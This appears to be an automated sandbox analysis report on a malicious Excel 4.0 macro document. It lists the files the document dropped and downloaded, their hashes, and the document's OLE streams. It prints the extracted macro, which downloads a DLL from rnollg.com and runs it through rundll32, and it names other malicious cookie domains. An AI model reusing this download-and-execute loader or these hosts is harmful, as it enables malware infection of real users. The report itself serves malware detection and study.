Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Joe Sandbox View:	Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Joe Sandbox View:	Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://rnollg.com/kev/scfrd.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B6EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	59780
Entropy (8bit):	7.769957533986089
Encrypted:	false
SSDEEP:	768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQpy:SwmW+aB3viH/WaI5xGVpoWpgKy
MD5:	72B1D491C5D55BF3759E1A84327B4DD1
SHA1:	158E7FAF1AD8630F40BE4CA0EE03AFBBFBDA7587
SHA-256:	8B7D4691F96CC39136EA47E1671C1FAC909624B6DA6ED446DC8AADFD43CF2241
SHA-512:	647345458376C066E95CD91EAB957760C97D03387FC33A4D7F07705A556908CA2FF5D3F9F7D63331BC8E9C2D43DE5302F2422931AFE0B3738D9BF0EE0E0B41CD
Malicious:	false
Reputation:	low
Preview:	..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..\|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r\|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a..BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{\|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:31:44 2021, atime=Wed Jan 27 04:31:44 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.485214050927514
Encrypted:	false
SSDEEP:	12:85Qlm0LgXg/XAlCPCHaXtB8XzB/POfUonX+WnicvbulbDtZ3YilMMEpxRljKQTdK:85Ri/XTd6jROfnYemDv3qRrNru/
MD5:	0F4A48D66050B828094DF3128D43FA34
SHA1:	E5EFE96BE8948B65B9CF903591E1ABBBB2E1BEBA
SHA-256:	18179E3A56673770272E6BD51EDD01BC37DDBD9F8BD1E5E487CC8AE5AEF4D09E
SHA-512:	F72296F6305C7F258898C9B93B222100C3AEA054DFAAC0A547763F1F48DB372D610B408A84E8C3868821CA40200A2100C318A9222BEE3375309B24FF6F0CE7BC
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G..\5..m...\5..m....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....;R.+..Desktop.d......QK.X;R.+..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\849224\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......849224..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (1522).LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Jan 27 04:31:44 2021, atime=Wed Jan 27 04:31:44 2021, length=99328, window=hide
Category:	dropped
Size (bytes):	4076
Entropy (8bit):	4.529756909715809
Encrypted:	false
SSDEEP:	96:8+k/XojFpNZsRQh2+k/XojFpNZsRQh2Rk/XojFpNZsRQh2Rk/XojFpNZsRQ/:8+ZjFUQE+ZjFUQERZjFUQERZjFUQ/
MD5:	E3A00E21A4C4A45FA2CFAEF5EF8E2903
SHA1:	CCE3D7DAEF300B6687B14FBDDB963532A25A40CB
SHA-256:	E6D56834373B2FDC3F5A7D7085E8CB028535661E9951F974949444DC4323DDD6
SHA-512:	7EF4CC7A0EC1ECCAACA31C3936D041E23BDCBBA61469FADD99FA4E13CEDE248ECB7E7DBF20BC21D7328E68D862CB33BA6200699F9EC966388E147C4E618DB6AD
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...8P\..{..\5..m......m................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.)d..;R.+ .CASE(1~1.XLS..L.......Q.y.Q.y...8.....................c.a.s.e. .(.1.5.2.2.)...x.l.s.......y...............-...8...[............?J......C:\Users\..#...................\\849224\Users.user\Desktop\case (1522).xls.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.1.5.2.2.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......849224..........D_....3N...W...9F.C...........[D_....3N...W...9F

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	176
Entropy (8bit):	4.505329288435076
Encrypted:	false
SSDEEP:	3:oyBVomMl6p2eIp6p2mMl6p2eIp6p2mMl6p2eIp6p2mMl6p2v:dj6wpowpowpowI
MD5:	7898FCF9F881DC3E2A62A466CB43A44F
SHA1:	9066A7712F6E5254EC4EDE917CCA3908408EA955
SHA-256:	4E0942ABBC3DE559BF69A31D5656B1F8E9916AF6B2F8B65FF867F9E5E4AAE04E
SHA-512:	C6F159B721144699B046DFBA1E1A7F94B437032D81D179DCFA86502462F4318A857A6C3ECFA93DD912F5C8606B167F10A8BF37C3CB8C86570888A64D9B8B5821
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..case (1522).LNK=0..case (1522).LNK=0..[xls]..case (1522).LNK=0..case (1522).LNK=0..[xls]..case (1522).LNK=0..case (1522).LNK=0..[xls]..case (1522).LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\B8J2SM51.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	115
Entropy (8bit):	4.444980817912232
Encrypted:	false
SSDEEP:	3:GmM/6cDpAOP6BhgvJMjMdl1cS0umOToSdT3gvX:XM/6c67BqvCjqlVZTLTg/
MD5:	F2F548DD24E9B0C38FF3FB517D7A4A0F
SHA1:	51450D25D76B8483F0732441CE04DB91603F61E5
SHA-256:	81194B069CFD8C50B1D1DAED8D4D0FE799BA0C3E838DBFDAD2170395F0636A2A
SHA-512:	3B171AB07647513E97E05EA2604EBB267D56B3DC22243CCBB2E1556422CD8A766133D3BC8BCF1BA06A9EBB41D3F63CA14B3404C72E324CA6E57E0918C84394BC
Malicious:	false
Reputation:	low
IE Cache URL:	govemedico.tk/
Preview:	__cfduid.d0989fb3cab30bfe1356f6a371d18fc201611693151.govemedico.tk/.9728.1462294912.30870453.2064030839.30864494.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SCG1PMXY.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	117
Entropy (8bit):	4.521867418691274
Encrypted:	false
SSDEEP:	3:GmM/lOTgydWAEagvLKUUn7w2lSNEHgcAmORV3dRRgvX:XM/lqgyUARUUn7weEciRVN3g/
MD5:	AC01CE5971047E2EA6BF0DB937581A45
SHA1:	5CBE04A79971B6399FD7DA8B8E5B5BC2A42FFE41
SHA-256:	033252D17B1FDEFD54EEC153F1D29263C060C9D7E7EE75C5A24173282D83472C
SHA-512:	4369FE019E55AD7BEFA99F00B9A4D24E2F6F7F95423D5274B8762634985F6670CE290986201CDE22F3A1261D215A849A4645DF00E4932A6AA31EBC7FDF928D8E
Malicious:	false
Reputation:	low
IE Cache URL:	gadgetswolf.com/
Preview:	__cfduid.d91f7caba7cf7dfd33ba1fbed0316feb51611693149.gadgetswolf.com/.9728.1442294912.30870453.2047650810.30864494.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TK4XJNTQ.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	119
Entropy (8bit):	4.448295634757574
Encrypted:	false
SSDEEP:	3:GmM/nYHDME6tU5TckvlAWqKJpKfcSNFA9mOQn6ShgvX:XM/nqPsPezqv0yApZUg/
MD5:	356F0AD06985ABA9C6183A4FA8A76EE7
SHA1:	1DDA2CDB4CED86480B074982353DDE2B890DCB83
SHA-256:	95ABA050D9A08499E7BE4ED70ED0A0172F0B5CB435168B3EFD08A9E88D81274D
SHA-512:	133B88BD0B5D85C1402E669C24DB474E07A7B674D18E98F95FD8A4DC387EE1126465214F81C422F3C09ED2CABF7893E8D844CF7BFBD767726D357A003CDD3075
Malicious:	false
Reputation:	low
IE Cache URL:	homesoapmolds.com/
Preview:	__cfduid.d3b015e68d25b82519975bf2921a745991611693150.homesoapmolds.com/.9728.1452294912.30870453.2057166827.30864494.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WG4KTJBM.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	112
Entropy (8bit):	4.414611423484315
Encrypted:	false
SSDEEP:	3:GmM/5BTu5N9PZGT0cSNKgl/mXVa6dTnvPv:XM/5BSPS5qMVa2TvPv
MD5:	FA4B1CD73EB3C02D11897B6C953D8216
SHA1:	6E2DFBB02BAF63D3AFCE6ECB2E652EE7E428E139
SHA-256:	7A2C0B3D4CB04A1E9B5566AE386AD2549C688BA04575681414E82A431D081F78
SHA-512:	85D68192D62DB243F63830215ABB21C9398AFC21DAD64F19D231FB9308AB14C5E101DE3F9EE5581BEE6787FC1DB6D350394290439741147517FBC674115F1A00
Malicious:	false
Reputation:	low
IE Cache URL:	rnollg.com/
Preview:	__cfduid.d459a91afca8f7f63a1f2b16f1e70adbe1611693116.rnollg.com/.9728.1112294912.30870453.3010501514.30864493.*.

C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	false
Joe Sandbox View:	Filename: case (4374).xls, Detection: malicious, Browse Filename: case (166).xls, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\77EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	173366
Entropy (8bit):	5.331212309889464
Encrypted:	false
SSDEEP:	3072:9xrtdAOtyoVlDGUUlEfblBiPP58LmlPi+aEvthl7aEv9rO6DxrtdAOtyoVlDGUUI:9xrtdAOtyoVlDGUUlEfblBeP52mlPi+r
MD5:	FC1ACCEE4EEA7DD95F645AD5268CC441
SHA1:	0200CD09465A6D678E181B7ABA98C9DB3432F754
SHA-256:	E1189A21C66B92E214199A29A3757DEA8359D5C3C22F109C285C23EC25678BCB
SHA-512:	C27C160AA615AC953622FEFCC78FE34DA347964999AF2EE4501D92A7CFF4C7C978E51D2BF05C0243AD3E48B06BD31392EFC821AE4876D81F726DF14FCBDC2328
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
Entropy (8bit):	3.8739671489784215
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	case (1522).xls
File size:	156713
MD5:	933ac69cb772d6e28636a81fc7665a26
SHA1:	7bb7870ebb261a2e0302600330abbc819d00acd3
SHA256:	d4592471179f7d3fbd94be05591c09c74b0d8b7dcca580504694c7514c1d9ef0
SHA512:	e4be1fa90192bb991468ce7edd1b951358de9287f26a1975a82ac60ded95ca9d337a0b89dc1deacc9ef836077c7345c4067de99bf82d15a406b6b3ce53ad8b52
SSDEEP:	3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g1E:49SUz4tH8vsderSh1yRNJdaAtH8U5B6P
File Content Preview:	........................>.......................0...........................-......./..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "case (1522).xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1251
Author:
Last Saved By:
Last Printed:	2021-01-26 16:17:13
Create Time:	2020-04-23 12:26:24
Last Saved Time:	2021-01-26 16:28:15
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.843601759481
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.362148031008
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	145752
Entropy:	3.94377585798
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
Data Raw:	09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,